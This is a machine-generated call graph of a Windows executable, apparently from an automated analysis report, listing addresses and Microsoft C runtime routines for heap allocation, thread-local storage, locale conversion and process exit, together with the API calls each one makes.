14427->14426 14429 40cbcf 14428->14429 14430 40e7ee _doexit 4 API calls 14429->14430 14431 40cbd9 14430->14431 14431->14225 14433 40ec4d __FF_MSGBANNER 63 API calls 14432->14433 14434 40e7a4 14433->14434 14435 40eaa2 __NMSG_WRITE 63 API calls 14434->14435 14436 40e7ac 14435->14436 14437 4104e9 __decode_pointer 6 API calls 14436->14437 14438 40cc71 14437->14438 14438->14233 14440 40e8de _doexit 63 API calls 14439->14440 14441 40ea41 14440->14441 14441->14255 14443 40e775 Sleep GetModuleHandleW 14442->14443 14444 40e793 14443->14444 14445 40e797 14443->14445 14444->14443 14444->14445 14445->14260 14507 4104e0 14446->14507 14448 40ea5c __init_pointers __initp_misc_winsig 14510 41393d 14448->14510 14451 41046e __encode_pointer 6 API calls 14452 40ea98 14451->14452 14453 41046e TlsGetValue 14452->14453 14454 4104a7 GetModuleHandleW 14453->14454 14455 410486 14453->14455 14457 4104c2 GetProcAddress 14454->14457 14458 4104b7 14454->14458 14455->14454 14456 410490 TlsGetValue 14455->14456 14461 41049b 14456->14461 14460 41049f 14457->14460 14459 40e76a __crt_waiting_on_module_handle 2 API calls 14458->14459 14462 4104bd 14459->14462 14460->14275 14461->14454 14461->14460 14462->14457 14462->14460 14464 40d56f 14463->14464 14466 40d59d 14464->14466 14513 41389c 14464->14513 14466->14261 14467 4104e9 TlsGetValue 14466->14467 14468 410501 14467->14468 14469 410522 GetModuleHandleW 14467->14469 14468->14469 14470 41050b TlsGetValue 14468->14470 14471 410532 14469->14471 14472 41053d GetProcAddress 14469->14472 14475 410516 14470->14475 14473 40e76a __crt_waiting_on_module_handle 2 API calls 14471->14473 14474 41051a 14472->14474 14476 410538 14473->14476 14474->14261 14477 411cba 14474->14477 14475->14469 14475->14474 14476->14472 14476->14474 14480 411cc3 14477->14480 14479 4109c5 14479->14261 14479->14287 14480->14479 14481 411ce1 Sleep 14480->14481 14518 40e231 14480->14518 14482 411cf6 14481->14482 14482->14479 14482->14480 14786 40e1d8 14483->14786 14485 4105e1 GetModuleHandleW 14486 4105f1 14485->14486 14487 4105f7 14485->14487 14488 40e76a __crt_waiting_on_module_handle 2 API calls 14486->14488 14489 410633 14487->14489 14490 41060f GetProcAddress GetProcAddress 14487->14490 14488->14487 14491 40d6e0 __lock 59 API calls 14489->14491 14490->14489 14492 410652 InterlockedIncrement 14491->14492 14787 4106aa 14492->14787 14495 40d6e0 __lock 59 API calls 14496 410673 14495->14496 14790 4145d2 InterlockedIncrement 14496->14790 14498 410691 14802 4106b3 14498->14802 14500 41069e _ftell 14500->14291 14502 4105a2 14501->14502 14506 4105ae 14501->14506 14503 4104e9 __decode_pointer 6 API calls 14502->14503 14503->14506 14504 4105d0 14504->14504 14505 4105c2 TlsFree 14505->14504 14506->14504 14506->14505 14508 41046e __encode_pointer 6 API calls 14507->14508 14509 4104e7 14508->14509 14509->14448 14511 41046e __encode_pointer 6 API calls 14510->14511 14512 40ea8e 14511->14512 14512->14451 14517 40e1d8 14513->14517 14515 4138a8 InitializeCriticalSectionAndSpinCount 14516 4138ec _ftell 14515->14516 14516->14464 14517->14515 14519 40e23d _ftell 14518->14519 14520 40e255 14519->14520 14530 40e274 _memset 14519->14530 14531 40bfc1 14520->14531 14523 40e2e6 HeapAlloc 14523->14530 14527 40e26a _ftell 14527->14480 14530->14523 14530->14527 14537 40d6e0 14530->14537 14544 40def2 14530->14544 14550 40e32d 14530->14550 14553 40d2e3 14530->14553 14556 4106bc GetLastError 14531->14556 14533 40bfc6 14534 40e744 14533->14534 14535 4104e9 __decode_pointer 6 API calls 14534->14535 14536 40e754 __invoke_watson 14535->14536 14538 40d6f5 14537->14538 14539 40d708 EnterCriticalSection 14537->14539 14581 40d61d 14538->14581 14539->14530 14541 40d6fb 14541->14539 14542 40e79a __amsg_exit 62 API calls 14541->14542 14543 40d707 14542->14543 14543->14539 14547 40df20 14544->14547 14545 40dfb9 14549 40dfc2 14545->14549 14781 40db09 14545->14781 14547->14545 14547->14549 14774 40da59 14547->14774 14549->14530 14785 40d606 LeaveCriticalSection 14550->14785 14552 40e334 14552->14530 14554 4104e9 __decode_pointer 6 API calls 14553->14554 14555 40d2f3 14554->14555 14555->14530 14570 410564 TlsGetValue 14556->14570 14559 410729 SetLastError 14559->14533 14560 411cba __calloc_crt 60 API calls 14561 4106e7 14560->14561 14561->14559 14562 4104e9 __decode_pointer 6 API calls 14561->14562 14563 410701 14562->14563 14564 410720 14563->14564 14565 410708 14563->14565 14575 40b6b5 14564->14575 14566 4105d5 __initptd 60 API calls 14565->14566 14568 410710 GetCurrentThreadId 14566->14568 14568->14559 14569 410726 14569->14559 14571 410594 14570->14571 14572 410579 14570->14572 14571->14559 14571->14560 14573 4104e9 __decode_pointer 6 API calls 14572->14573 14574 410584 TlsSetValue 14573->14574 14574->14571 14576 40b6c1 _ftell 14575->14576 14577 40b73d _ftell 14576->14577 14578 40b714 HeapFree 14576->14578 14577->14569 14578->14577 14579 40b727 14578->14579 14580 40bfc1 _ftell 62 API calls 14579->14580 14580->14577 14582 40d629 _ftell 14581->14582 14583 40d64f 14582->14583 14607 40ec4d 14582->14607 14591 40d65f _ftell 14583->14591 14653 411c75 14583->14653 14589 40d680 14594 40d6e0 __lock 63 API calls 14589->14594 14590 40d671 14593 40bfc1 _ftell 63 API calls 14590->14593 14591->14541 14593->14591 14596 40d687 14594->14596 14597 40d6bb 14596->14597 14598 40d68f 14596->14598 14599 40b6b5 ___crtsetenv 63 API calls 14597->14599 14600 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 14598->14600 14601 40d6ac 14599->14601 14602 40d69a 14600->14602 14658 40d6d7 14601->14658 14602->14601 14603 40b6b5 ___crtsetenv 63 API calls 14602->14603 14605 40d6a6 14603->14605 14606 40bfc1 _ftell 63 API calls 14605->14606 14606->14601 14661 413d5b 14607->14661 14610 40ec61 14612 40eaa2 __NMSG_WRITE 63 API calls 14610->14612 14615 40d63e 14610->14615 14611 413d5b __set_error_mode 63 API calls 14611->14610 14613 40ec79 14612->14613 14614 40eaa2 __NMSG_WRITE 63 API calls 14613->14614 14614->14615 14616 40eaa2 14615->14616 14617 40eab6 14616->14617 14618 40d645 14617->14618 14619 413d5b __set_error_mode 60 API calls 14617->14619 14650 40e7ee 14618->14650 14620 40ead8 14619->14620 14621 40ec16 GetStdHandle 14620->14621 14623 413d5b __set_error_mode 60 API calls 14620->14623 14621->14618 14622 40ec24 _strlen 14621->14622 14622->14618 14626 40ec3d WriteFile 14622->14626 14624 40eae9 14623->14624 14624->14621 14625 40eafb 14624->14625 14625->14618 14667 40ef42 14625->14667 14626->14618 14629 40eb31 GetModuleFileNameA 14631 40eb4f 14629->14631 14635 40eb72 _strlen 14629->14635 14633 40ef42 _strcpy_s 60 API calls 14631->14633 14634 40eb5f 14633->14634 14634->14635 14637 40e61c __invoke_watson 10 API calls 14634->14637 14636 40ebb5 14635->14636 14683 411da6 14635->14683 14692 413ce7 14636->14692 14637->14635 14641 40ebd9 14644 413ce7 _strcat_s 60 API calls 14641->14644 14643 40e61c __invoke_watson 10 API calls 14643->14641 14645 40ebed 14644->14645 14647 40ebfe 14645->14647 14648 40e61c __invoke_watson 10 API calls 14645->14648 14646 40e61c __invoke_watson 10 API calls 14646->14636 14701 413b7e 14647->14701 14648->14647 14739 40e7c3 GetModuleHandleW 14650->14739 14654 411c7e 14653->14654 14656 40d66a 14654->14656 14657 411c95 Sleep 14654->14657 14743 40b84d 14654->14743 14656->14589 14656->14590 14657->14654 14773 40d606 LeaveCriticalSection 14658->14773 14660 40d6de 14660->14591 14662 413d6a 14661->14662 14663 40bfc1 _ftell 63 API calls 14662->14663 14666 40ec54 14662->14666 14664 413d8d 14663->14664 14665 40e744 _ftell 6 API calls 14664->14665 14665->14666 14666->14610 14666->14611 14668 40ef53 14667->14668 14669 40ef5a 14667->14669 14668->14669 14671 40ef80 14668->14671 14670 40bfc1 _ftell 63 API calls 14669->14670 14675 40ef5f 14670->14675 14673 40eb1d 14671->14673 14674 40bfc1 _ftell 63 API calls 14671->14674 14672 40e744 _ftell 6 API calls 14672->14673 14673->14629 14676 40e61c 14673->14676 14674->14675 14675->14672 14728 40ba30 14676->14728 14678 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14679 40e725 GetCurrentProcess TerminateProcess 14678->14679 14680 40e719 __invoke_watson 14678->14680 14730 40ce09 14679->14730 14680->14679 14682 40e742 14682->14629 14687 411db8 14683->14687 14684 411dbc 14685 40bfc1 _ftell 63 API calls 14684->14685 14686 40eba2 14684->14686 14691 411dd8 14685->14691 14686->14636 14686->14646 14687->14684 14687->14686 14689 411e02 14687->14689 14688 40e744 _ftell 6 API calls 14688->14686 14689->14686 14690 40bfc1 _ftell 63 API calls 14689->14690 14690->14691 14691->14688 14693 413cff 14692->14693 14695 413cf8 14692->14695 14694 40bfc1 _ftell 63 API calls 14693->14694 14700 413d04 14694->14700 14695->14693 14698 413d33 14695->14698 14696 40e744 _ftell 6 API calls 14697 40ebc8 14696->14697 14697->14641 14697->14643 14698->14697 14699 40bfc1 _ftell 63 API calls 14698->14699 14699->14700 14700->14696 14702 4104e0 _raise 6 API calls 14701->14702 14703 413b8e 14702->14703 14704 413ba1 LoadLibraryA 14703->14704 14706 413c29 14703->14706 14705 413bb6 GetProcAddress 14704->14705 14712 413ccb 14704->14712 14707 413bcc 14705->14707 14705->14712 14710 4104e9 __decode_pointer 6 API calls 14706->14710 14723 413c53 14706->14723 14711 41046e __encode_pointer 6 API calls 14707->14711 14708 4104e9 __decode_pointer 6 API calls 14708->14712 14709 4104e9 __decode_pointer 6 API calls 14720 413c96 14709->14720 14713 413c46 14710->14713 14714 413bd2 GetProcAddress 14711->14714 14712->14618 14715 4104e9 __decode_pointer 6 API calls 14713->14715 14716 41046e __encode_pointer 6 API calls 14714->14716 14715->14723 14717 413be7 GetProcAddress 14716->14717 14718 41046e __encode_pointer 6 API calls 14717->14718 14719 413bfc GetProcAddress 14718->14719 14721 41046e __encode_pointer 6 API calls 14719->14721 14722 4104e9 __decode_pointer 6 API calls 14720->14722 14725 413c7e 14720->14725 14724 413c11 14721->14724 14722->14725 14723->14709 14723->14725 14724->14706 14726 413c1b GetProcAddress 14724->14726 14725->14708 14727 41046e __encode_pointer 6 API calls 14726->14727 14727->14706 14729 40ba3c __VEC_memzero 14728->14729 14729->14678 14731 40ce11 14730->14731 14732 40ce13 IsDebuggerPresent 14730->14732 14731->14682 14738 4138fc 14732->14738 14735 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 14736 413723 __invoke_watson 14735->14736 14737 41372b GetCurrentProcess TerminateProcess 14735->14737 14736->14737 14737->14682 14738->14735 14740 40e7d7 GetProcAddress 14739->14740 14741 40e7ec ExitProcess 14739->14741 14740->14741 14742 40e7e7 CorExitProcess 14740->14742 14742->14741 14744 40b900 14743->14744 14745 40b85f 14743->14745 14746 40d2e3 _realloc 6 API calls 14744->14746 14748 40b870 14745->14748 14752 40b8f8 14745->14752 14754 40b8bc RtlAllocateHeap 14745->14754 14756 40b8ec 14745->14756 14757 40d2e3 _realloc 6 API calls 14745->14757 14759 40b8f1 14745->14759 14761 40b7fe 14745->14761 14747 40b906 14746->14747 14750 40bfc1 _ftell 62 API calls 14747->14750 14748->14745 14749 40ec4d __FF_MSGBANNER 62 API calls 14748->14749 14751 40eaa2 __NMSG_WRITE 62 API calls 14748->14751 14755 40e7ee _doexit 4 API calls 14748->14755 14749->14748 14750->14752 14751->14748 14752->14654 14754->14745 14755->14748 14758 40bfc1 _ftell 62 API calls 14756->14758 14757->14745 14758->14759 14760 40bfc1 _ftell 62 API calls 14759->14760 14760->14752 14762 40b80a _ftell 14761->14762 14763 40b83b _ftell 14762->14763 14764 40d6e0 __lock 63 API calls 14762->14764 14763->14745 14765 40b820 14764->14765 14766 40def2 ___sbh_alloc_block 5 API calls 14765->14766 14767 40b82b 14766->14767 14769 40b844 14767->14769 14772 40d606 LeaveCriticalSection 14769->14772 14771 40b84b 14771->14763 14772->14771 14773->14660 14775 40daa0 HeapAlloc 14774->14775 14776 40da6c HeapReAlloc 14774->14776 14777 40dac3 VirtualAlloc 14775->14777 14778 40da8a 14775->14778 14776->14778 14779 40da8e 14776->14779 14777->14778 14780 40dadd HeapFree 14777->14780 14778->14545 14779->14775 14780->14778 14782 40db20 VirtualAlloc 14781->14782 14784 40db67 14782->14784 14784->14549 14785->14552 14786->14485 14805 40d606 LeaveCriticalSection 14787->14805 14789 41066c 14789->14495 14791 4145f0 InterlockedIncrement 14790->14791 14792 4145f3 14790->14792 14791->14792 14793 414600 14792->14793 14794 4145fd InterlockedIncrement 14792->14794 14795 41460a InterlockedIncrement 14793->14795 14796 41460d 14793->14796 14794->14793 14795->14796 14797 414617 InterlockedIncrement 14796->14797 14798 41461a 14796->14798 14797->14798 14799 414633 InterlockedIncrement 14798->14799 14800 414643 InterlockedIncrement 14798->14800 14801 41464e InterlockedIncrement 14798->14801 14799->14798 14800->14798 14801->14498 14806 40d606 LeaveCriticalSection 14802->14806 14804 4106ba 14804->14500 14805->14789 14806->14804 14807->14294 14810 41265c 14808->14810 14812 4126c9 14810->14812 14818 416836 14810->14818 14811 4127c7 14811->14340 14811->14341 14812->14811 14813 416836 73 API calls _parse_cmdline 14812->14813 14813->14812 14815 414474 14814->14815 14817 41447b 14814->14817 15040 4142d1 14815->15040 14817->14334 14821 4167e3 14818->14821 14824 40ec86 14821->14824 14825 40ec99 14824->14825 14831 40ece6 14824->14831 14832 410735 14825->14832 14828 40ecc6 14828->14831 14852 413fcc 14828->14852 14831->14810 14833 4106bc __getptd_noexit 63 API calls 14832->14833 14834 41073d 14833->14834 14835 40ec9e 14834->14835 14836 40e79a __amsg_exit 63 API calls 14834->14836 14835->14828 14837 414738 14835->14837 14836->14835 14838 414744 _ftell 14837->14838 14839 410735 __getptd 63 API calls 14838->14839 14840 414749 14839->14840 14841 414777 14840->14841 14843 41475b 14840->14843 14842 40d6e0 __lock 63 API calls 14841->14842 14844 41477e 14842->14844 14845 410735 __getptd 63 API calls 14843->14845 14868 4146fa 14844->14868 14847 414760 14845->14847 14849 41476e _ftell 14847->14849 14851 40e79a __amsg_exit 63 API calls 14847->14851 14849->14828 14851->14849 14853 413fd8 _ftell 14852->14853 14854 410735 __getptd 63 API calls 14853->14854 14855 413fdd 14854->14855 14856 40d6e0 __lock 63 API calls 14855->14856 14858 413fef 14855->14858 14857 41400d 14856->14857 14859 414056 14857->14859 14863 414024 InterlockedDecrement 14857->14863 14864 41403e InterlockedIncrement 14857->14864 14860 413ffd _ftell 14858->14860 14862 40e79a __amsg_exit 63 API calls 14858->14862 15036 414067 14859->15036 14860->14831 14862->14860 14863->14864 14865 41402f 14863->14865 14864->14859 14865->14864 14866 40b6b5 ___crtsetenv 63 API calls 14865->14866 14867 41403d 14866->14867 14867->14864 14869 4146fe 14868->14869 14870 414730 14868->14870 14869->14870 14871 4145d2 ___addlocaleref 8 API calls 14869->14871 14876 4147a2 14870->14876 14872 414711 14871->14872 14872->14870 14879 414661 14872->14879 15035 40d606 LeaveCriticalSection 14876->15035 14878 4147a9 14878->14847 14880 414672 InterlockedDecrement 14879->14880 14881 4146f5 14879->14881 14882 414687 InterlockedDecrement 14880->14882 14883 41468a 14880->14883 14881->14870 14893 414489 14881->14893 14882->14883 14884 414694 InterlockedDecrement 14883->14884 14885 414697 14883->14885 14884->14885 14886 4146a1 InterlockedDecrement 14885->14886 14887 4146a4 14885->14887 14886->14887 14888 4146ae InterlockedDecrement 14887->14888 14890 4146b1 14887->14890 14888->14890 14889 4146ca InterlockedDecrement 14889->14890 14890->14889 14891 4146da InterlockedDecrement 14890->14891 14892 4146e5 InterlockedDecrement 14890->14892 14891->14890 14892->14881 14894 4144a0 14893->14894 14895 41450d 14893->14895 14894->14895 14899 4144d4 14894->14899 14906 40b6b5 ___crtsetenv 63 API calls 14894->14906 14896 41455a 14895->14896 14897 40b6b5 ___crtsetenv 63 API calls 14895->14897 14908 414581 14896->14908 14947 417667 14896->14947 14900 41452e 14897->14900 14902 4144f5 14899->14902 14913 40b6b5 ___crtsetenv 63 API calls 14899->14913 14903 40b6b5 ___crtsetenv 63 API calls 14900->14903 14904 40b6b5 ___crtsetenv 63 API calls 14902->14904 14909 414541 14903->14909 14910 414502 14904->14910 14905 40b6b5 ___crtsetenv 63 API calls 14905->14908 14911 4144c9 14906->14911 14907 4145c6 14912 40b6b5 ___crtsetenv 63 API calls 14907->14912 14908->14907 14915 40b6b5 63 API calls ___crtsetenv 14908->14915 14914 40b6b5 ___crtsetenv 63 API calls 14909->14914 14916 40b6b5 ___crtsetenv 63 API calls 14910->14916 14923 417841 14911->14923 14918 4145cc 14912->14918 14919 4144ea 14913->14919 14920 41454f 14914->14920 14915->14908 14916->14895 14918->14870 14939 4177fc 14919->14939 14922 40b6b5 ___crtsetenv 63 API calls 14920->14922 14922->14896 14924 4178cb 14923->14924 14925 41784e 14923->14925 14924->14899 14926 41785f 14925->14926 14927 40b6b5 ___crtsetenv 63 API calls 14925->14927 14928 417871 14926->14928 14929 40b6b5 ___crtsetenv 63 API calls 14926->14929 14927->14926 14930 417883 14928->14930 14931 40b6b5 ___crtsetenv 63 API calls 14928->14931 14929->14928 14932 417895 14930->14932 14934 40b6b5 ___crtsetenv 63 API calls 14930->14934 14931->14930 14933 4178a7 14932->14933 14935 40b6b5 ___crtsetenv 63 API calls 14932->14935 14936 4178b9 14933->14936 14937 40b6b5 ___crtsetenv 63 API calls 14933->14937 14934->14932 14935->14933 14936->14924 14938 40b6b5 ___crtsetenv 63 API calls 14936->14938 14937->14936 14938->14924 14940 417809 14939->14940 14941 41783d 14939->14941 14942 417819 14940->14942 14943 40b6b5 ___crtsetenv 63 API calls 14940->14943 14941->14902 14944 41782b 14942->14944 14945 40b6b5 ___crtsetenv 63 API calls 14942->14945 14943->14942 14944->14941 14946 40b6b5 ___crtsetenv 63 API calls 14944->14946 14945->14944 14946->14941 14948 41457a 14947->14948 14949 417678 14947->14949 14948->14905 14950 40b6b5 ___crtsetenv 63 API calls 14949->14950 14951 417680 14950->14951 14952 40b6b5 ___crtsetenv 63 API calls 14951->14952 14953 417688 14952->14953 14954 40b6b5 ___crtsetenv 63 API calls 14953->14954 14955 417690 14954->14955 14956 40b6b5 ___crtsetenv 63 API calls 14955->14956 14957 417698 14956->14957 14958 40b6b5 ___crtsetenv 63 API calls 14957->14958 14959 4176a0 14958->14959 14960 40b6b5 ___crtsetenv 63 API calls 14959->14960 14961 4176a8 14960->14961 14962 40b6b5 ___crtsetenv 63 API calls 14961->14962 14963 4176af 14962->14963 14964 40b6b5 ___crtsetenv 63 API calls 14963->14964 14965 4176b7 14964->14965 14966 40b6b5 ___crtsetenv 63 API calls 14965->14966 14967 4176bf 14966->14967 14968 40b6b5 ___crtsetenv 63 API calls 14967->14968 14969 4176c7 14968->14969 14970 40b6b5 ___crtsetenv 63 API calls 14969->14970 14971 4176cf 14970->14971 14972 40b6b5 ___crtsetenv 63 API calls 14971->14972 14973 4176d7 14972->14973 14974 40b6b5 ___crtsetenv 63 API calls 14973->14974 14975 4176df 14974->14975 14976 40b6b5 ___crtsetenv 63 API calls 14975->14976 14977 4176e7 14976->14977 14978 40b6b5 ___crtsetenv 63 API calls 14977->14978 14979 4176ef 14978->14979 14980 40b6b5 ___crtsetenv 63 API calls 14979->14980 14981 4176f7 14980->14981 14982 40b6b5 ___crtsetenv 63 API calls 14981->14982 14983 417702 14982->14983 14984 40b6b5 ___crtsetenv 63 API calls 14983->14984 14985 41770a 14984->14985 14986 40b6b5 ___crtsetenv 63 API calls 14985->14986 14987 417712 14986->14987 14988 40b6b5 ___crtsetenv 63 API calls 14987->14988 14989 41771a 14988->14989 14990 40b6b5 ___crtsetenv 63 API calls 14989->14990 14991 417722 14990->14991 14992 40b6b5 ___crtsetenv 63 API calls 14991->14992 14993 41772a 14992->14993 14994 40b6b5 ___crtsetenv 63 API calls 14993->14994 14995 417732 14994->14995 14996 40b6b5 ___crtsetenv 63 API calls 14995->14996 14997 41773a 14996->14997 14998 40b6b5 ___crtsetenv 63 API calls 14997->14998 14999 417742 14998->14999 15000 40b6b5 ___crtsetenv 63 API calls 14999->15000 15001 41774a 15000->15001 15002 40b6b5 ___crtsetenv 63 API calls 15001->15002 15003 417752 15002->15003 15004 40b6b5 ___crtsetenv 63 API calls 15003->15004 15005 41775a 15004->15005 15006 40b6b5 ___crtsetenv 63 API calls 15005->15006 15007 417762 15006->15007 15008 40b6b5 ___crtsetenv 63 API calls 15007->15008 15009 41776a 15008->15009 15010 40b6b5 ___crtsetenv 63 API calls 15009->15010 15011 417772 15010->15011 15012 40b6b5 ___crtsetenv 63 API calls 15011->15012 15013 41777a 15012->15013 15014 40b6b5 ___crtsetenv 63 API calls 15013->15014 15015 417788 15014->15015 15016 40b6b5 ___crtsetenv 63 API calls 15015->15016 15017 417793 15016->15017 15018 40b6b5 ___crtsetenv 63 API calls 15017->15018 15019 41779e 15018->15019 15020 40b6b5 ___crtsetenv 63 API calls 15019->15020 15021 4177a9 15020->15021 15022 40b6b5 ___crtsetenv 63 API calls 15021->15022 15023 4177b4 15022->15023 15024 40b6b5 ___crtsetenv 63 API calls 15023->15024 15025 4177bf 15024->15025 15026 40b6b5 ___crtsetenv 63 API calls 15025->15026 15027 4177ca 15026->15027 15028 40b6b5 ___crtsetenv 63 API calls 15027->15028 15029 4177d5 15028->15029 15030 40b6b5 ___crtsetenv 63 API calls 15029->15030 15031 4177e0 15030->15031 15032 40b6b5 ___crtsetenv 63 API calls 15031->15032 15033 4177eb 15032->15033 15034 40b6b5 ___crtsetenv 63 API calls 15033->15034 15034->14948 15035->14878 15039 40d606 LeaveCriticalSection 15036->15039 15038 41406e 15038->14858 15039->15038 15041 4142dd _ftell 15040->15041 15042 410735 __getptd 63 API calls 15041->15042 15043 4142e6 15042->15043 15044 413fcc __setmbcp 65 API calls 15043->15044 15045 4142f0 15044->15045 15071 414070 15045->15071 15048 411c75 __malloc_crt 63 API calls 15049 414311 15048->15049 15050 414430 _ftell 15049->15050 15078 4140ec 15049->15078 15050->14817 15053 414341 InterlockedDecrement 15055 414351 15053->15055 15056 414362 InterlockedIncrement 15053->15056 15054 41443d 15054->15050 15057 414450 15054->15057 15059 40b6b5 ___crtsetenv 63 API calls 15054->15059 15055->15056 15061 40b6b5 ___crtsetenv 63 API calls 15055->15061 15056->15050 15058 414378 15056->15058 15060 40bfc1 _ftell 63 API calls 15057->15060 15058->15050 15063 40d6e0 __lock 63 API calls 15058->15063 15059->15057 15060->15050 15062 414361 15061->15062 15062->15056 15065 41438c InterlockedDecrement 15063->15065 15066 414408 15065->15066 15067 41441b InterlockedIncrement 15065->15067 15066->15067 15069 40b6b5 ___crtsetenv 63 API calls 15066->15069 15088 414432 15067->15088 15070 41441a 15069->15070 15070->15067 15072 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15071->15072 15073 414084 15072->15073 15074 4140ad 15073->15074 15075 41408f GetOEMCP 15073->15075 15076 4140b2 GetACP 15074->15076 15077 41409f 15074->15077 15075->15077 15076->15077 15077->15048 15077->15050 15079 414070 getSystemCP 75 API calls 15078->15079 15080 41410c 15079->15080 15081 414117 setSBCS 15080->15081 15084 41415b IsValidCodePage 15080->15084 15086 414180 _memset __setmbcp_nolock 15080->15086 15082 40ce09 _$I10_OUTPUT 5 API calls 15081->15082 15083 4142cf 15082->15083 15083->15053 15083->15054 15084->15081 15085 41416d GetCPInfo 15084->15085 15085->15081 15085->15086 15091 413e39 GetCPInfo 15086->15091 15224 40d606 LeaveCriticalSection 15088->15224 15090 414439 15090->15050 15092 413f1f 15091->15092 15093 413e6d _memset 15091->15093 15097 40ce09 _$I10_OUTPUT 5 API calls 15092->15097 15101 417625 15093->15101 15099 413fca 15097->15099 15099->15086 15100 417426 ___crtLCMapStringA 98 API calls 15100->15092 15102 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15101->15102 15103 417638 15102->15103 15111 41746b 15103->15111 15106 417426 15107 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15106->15107 15108 417439 15107->15108 15177 417081 15108->15177 15112 4174b7 15111->15112 15113 41748c GetStringTypeW 15111->15113 15114 41759e 15112->15114 15115 4174a4 15112->15115 15113->15115 15116 4174ac GetLastError 15113->15116 15139 417a20 GetLocaleInfoA 15114->15139 15117 4174f0 MultiByteToWideChar 15115->15117 15127 417598 15115->15127 15116->15112 15122 41751d 15117->15122 15117->15127 15119 40ce09 _$I10_OUTPUT 5 API calls 15120 413eda 15119->15120 15120->15106 15124 40b84d _malloc 63 API calls 15122->15124 15129 417532 _memset __crtCompareStringA_stat 15122->15129 15123 4175ef GetStringTypeA 15123->15127 15128 41760a 15123->15128 15124->15129 15126 41756b MultiByteToWideChar 15131 417581 GetStringTypeW 15126->15131 15132 417592 15126->15132 15127->15119 15133 40b6b5 ___crtsetenv 63 API calls 15128->15133 15129->15126 15129->15127 15131->15132 15135 4147ae 15132->15135 15133->15127 15136 4147ba 15135->15136 15137 4147cb 15135->15137 15136->15137 15138 40b6b5 ___crtsetenv 63 API calls 15136->15138 15137->15127 15138->15137 15140 417a53 15139->15140 15141 417a4e 15139->15141 15170 416f54 15140->15170 15143 40ce09 _$I10_OUTPUT 5 API calls 15141->15143 15144 4175c2 15143->15144 15144->15123 15144->15127 15145 417a69 15144->15145 15146 417aa9 GetCPInfo 15145->15146 15147 417b33 15145->15147 15148 417ac0 15146->15148 15149 417b1e MultiByteToWideChar 15146->15149 15150 40ce09 _$I10_OUTPUT 5 API calls 15147->15150 15148->15149 15151 417ac6 GetCPInfo 15148->15151 15149->15147 15154 417ad9 _strlen 15149->15154 15153 4175e3 15150->15153 15151->15149 15152 417ad3 15151->15152 15152->15149 15152->15154 15153->15123 15153->15127 15155 40b84d _malloc 63 API calls 15154->15155 15157 417b0b _memset __crtCompareStringA_stat 15154->15157 15155->15157 15156 417b68 MultiByteToWideChar 15158 417b80 15156->15158 15159 417b9f 15156->15159 15157->15147 15157->15156 15161 417ba4 15158->15161 15162 417b87 WideCharToMultiByte 15158->15162 15160 4147ae __freea 63 API calls 15159->15160 15160->15147 15163 417bc3 15161->15163 15164 417baf WideCharToMultiByte 15161->15164 15162->15159 15165 411cba __calloc_crt 63 API calls 15163->15165 15164->15159 15164->15163 15166 417bcb 15165->15166 15166->15159 15167 417bd4 WideCharToMultiByte 15166->15167 15167->15159 15168 417be6 15167->15168 15169 40b6b5 ___crtsetenv 63 API calls 15168->15169 15169->15159 15173 41a354 15170->15173 15174 41a36d 15173->15174 15175 41a125 strtoxl 87 API calls 15174->15175 15176 416f65 15175->15176 15176->15141 15178 4170a2 LCMapStringW 15177->15178 15181 4170bd 15177->15181 15179 4170c5 GetLastError 15178->15179 15178->15181 15179->15181 15180 4172bb 15183 417a20 ___ansicp 87 API calls 15180->15183 15181->15180 15182 417117 15181->15182 15184 417130 MultiByteToWideChar 15182->15184 15201 4172b2 15182->15201 15185 4172e3 15183->15185 15191 41715d 15184->15191 15184->15201 15189 4173d7 LCMapStringA 15185->15189 15190 4172fc 15185->15190 15185->15201 15186 40ce09 _$I10_OUTPUT 5 API calls 15187 413efa 15186->15187 15187->15100 15188 417176 __crtCompareStringA_stat 15193 4171ae MultiByteToWideChar 15188->15193 15188->15201 15194 417333 15189->15194 15192 417a69 ___convertcp 70 API calls 15190->15192 15191->15188 15196 40b84d _malloc 63 API calls 15191->15196 15197 41730e 15192->15197 15198 4171c7 LCMapStringW 15193->15198 15199 4172a9 15193->15199 15195 4173fe 15194->15195 15200 40b6b5 ___crtsetenv 63 API calls 15194->15200 15195->15201 15206 40b6b5 ___crtsetenv 63 API calls 15195->15206 15196->15188 15197->15201 15202 417318 LCMapStringA 15197->15202 15198->15199 15204 4171e8 15198->15204 15203 4147ae __freea 63 API calls 15199->15203 15200->15195 15201->15186 15202->15194 15210 41733a 15202->15210 15203->15201 15205 4171f1 15204->15205 15209 41721a 15204->15209 15205->15199 15207 417203 LCMapStringW 15205->15207 15206->15201 15207->15199 15208 417269 LCMapStringW 15211 417281 WideCharToMultiByte 15208->15211 15212 4172a3 15208->15212 15214 417235 __crtCompareStringA_stat 15209->15214 15216 40b84d _malloc 63 API calls 15209->15216 15213 40b84d _malloc 63 API calls 15210->15213 15215 41734b _memset __crtCompareStringA_stat 15210->15215 15211->15212 15217 4147ae __freea 63 API calls 15212->15217 15213->15215 15214->15199 15214->15208 15215->15194 15218 417389 LCMapStringA 15215->15218 15216->15214 15217->15199 15220 4173a5 15218->15220 15221 4173a9 15218->15221 15223 4147ae __freea 63 API calls 15220->15223 15222 417a69 ___convertcp 70 API calls 15221->15222 15222->15220 15223->15194 15224->15090 15226 41358c 15225->15226 15227 41046e __encode_pointer 6 API calls 15226->15227 15228 4135a4 15226->15228 15227->15226 15228->14364 15232 40d281 15229->15232 15231 40d2ca 15231->14366 15233 40d28d _ftell 15232->15233 15240 40e806 15233->15240 15239 40d2ae _ftell 15239->15231 15241 40d6e0 __lock 63 API calls 15240->15241 15242 40d292 15241->15242 15243 40d196 15242->15243 15244 4104e9 __decode_pointer 6 API calls 15243->15244 15245 40d1aa 15244->15245 15246 4104e9 __decode_pointer 6 API calls 15245->15246 15247 40d1ba 15246->15247 15257 40d23d 15247->15257 15263 40e56a 15247->15263 15249 40d224 15250 41046e __encode_pointer 6 API calls 15249->15250 15251 40d232 15250->15251 15254 41046e __encode_pointer 6 API calls 15251->15254 15252 40d1fc 15256 411d06 __realloc_crt 73 API calls 15252->15256 15252->15257 15258 40d212 15252->15258 15253 40d1d8 15253->15249 15253->15252 15276 411d06 15253->15276 15254->15257 